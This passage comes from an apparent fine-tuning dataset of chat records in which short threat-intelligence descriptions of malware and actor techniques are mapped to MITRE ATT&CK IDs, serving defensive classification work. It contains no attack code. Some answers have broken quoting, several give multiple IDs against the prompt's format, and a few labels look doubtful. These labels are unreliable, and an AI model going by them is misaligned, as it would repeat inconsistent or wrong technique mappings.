- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used the command-line interface for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1115 - Clipboard Data', 'T1560 - Archive Collected Data', 'T1132 - Data Encoding', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dumps password hashes for use in pass the hash authentication attacks."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has used multiple native Windows APIs to execute and conduct process injections."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear has used RC4 encrypted shellcode and encrypted functions."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P8RAT has the ability to \"sleep\" for a specified time to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok exfiltrates logs of its execution stored in the \"/tmp\" folder over FTP using the \"curl\" command."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations."
- },
- {
- "role": "assistant",
- "content": "T1526 - Cloud Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas adds a new service named NetAdapter to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate"
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VaporRage can deobfuscate XOR-encoded shellcode prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can decode and decrypt data received from C2."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT has a command to download a file from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can timestomp any files or payloads placed on a target machine to help them blend in."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor monitors the free disk space on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT has spread through emails with newly created malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "writes data into the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another interesting artefact is that the script modifies the modification, access and creation (MAC) times of the local log file to match the times of a legitimate file – desktop.ini in that example, as shown in Figure 13"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk can create .dll files that actually contain a Rich Text File format document."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Brave Prince lists the running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GandCrab 2 is far from a merely repackaged GandCrab 1. It contains fixes for several flaws in the original, including one critical encryption flaw that would have trivially allowed a universal decryptor (more on this below)."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can detect network adapter and IP address information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 Countries in which OopsIE will run in based on the time zone Notable Differences The OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant discussed in our previous blog"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our public report."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY mimics filenames from %SYSTEM%\\System32 to hide DLLs in %WINDIR% and/or %TEMP%."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay', 'T1043 - Commonly Used Port', 'T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, the program turned out not to be a Gpcode variant. This new version of Bancos.aam turned out to be the first Trojan spy program designed to steal data from users of the Russian QUIK system. "
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keylogging Functionality XAgent also has a keylogger functionality that allows the threat actors to steal credentials as the user types them"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat communicated over HTTP and HTTPS with C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) If the malware was executed with the \"install\" command-line argument, which uses .NET Framwork’s InstallHelper method to install the malware as a service. 3) If no arguments are provided and the malware determines it is running in a Windows environment, it saves a DLL to the system that it injects into the explorer.exe process. The injected DLL executable loads the malware’s executable and runs it within memory of the explorer.exe process"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details Of The Attacks . Our examination of the acquired samples shows hackers generally use two main methods of “Sending Fake SMS” and “Sending Fake Emails” to execute their attacks. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email . Another method used in this phishing campaign is sending fake emails with deceptive titles like “Merry Christmas, and sending note/book/photo and others”, which are usually sent by previously hacked emails. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email’s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of fake email after sending the initial email to the target . Redirect Chain . Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten’s phishing campaign and that this campaign has significantly intensified in recent days"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HALFBAKED can obtain screenshots from the victim."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used C:\\Windows\\Debug and C:\\Perflogs as staging directories."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar has been spread via emails with embedded malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Get-Keystrokes\" Exfiltration module can log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has used Registry Run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration blob is encoded using a simple single-byte XOR scheme"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHTRACK scrapes memory for properly formatted payment card data."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the OS name, machine name, and architecture information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET exfiltrates data stolen from a system over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed)."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can list out currently running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can enable/disable RDP connection and can start a remote desktop session using a browser web socket client."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has the ability to identify the username on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster can use \"stackstrings\" for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive can scan all .exe files located in the USB drive."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4H RAT has the capability to create a remote shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI has established persistence by writing the payload to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia creates a command-line shell using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot can create a shortcut in the Windows startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
